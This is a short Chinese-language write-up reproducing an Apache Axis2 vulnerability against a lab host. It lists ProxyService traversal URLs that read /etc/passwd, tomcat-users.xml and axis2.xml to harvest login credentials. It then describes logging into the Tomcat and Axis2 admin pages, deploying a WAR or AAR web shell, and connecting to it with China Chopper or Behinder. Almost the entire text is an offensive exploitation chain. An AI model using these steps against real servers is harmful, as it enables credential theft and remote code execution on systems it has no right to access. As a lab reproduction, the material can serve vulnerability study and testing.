Apache Axis2 漏洞复现

Axis2是Apache Foundation的一个项目，它允许开发人员用C和Java创建Web服务。

默认情况下，Axis2部署在/axis2/（当开发人员使用时axis2.war）

漏洞利用

遍历漏洞

1、访问axis路径下

2访问http://192.168.227.140/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml

http://192.168.227.140/axis2/services/ProxyService/get?uri=file:///etc/passwd等敏感路径找到tomcat登录账号密码

3、猜解tomcat管理路径（/tomcat/html），并部署war包（jsp），使其成功解析，并访问根目录（IP/shell/shell.jsp）

4.成功使用菜刀或冰蟹连接

 二、检索Axis2配置以获取登录凭据

1、axis2配置文件axis2.xml具有默认位置：/var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml（http://192.168.227.140/axis2/services/ProxyService/get?uri=file:////var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml）

利用遍历漏洞检索axis2的账号密码

 2、访问axis2的管理页面

使用账号密码登录，部署war包

此处需要部署aar包，上传后被成功解析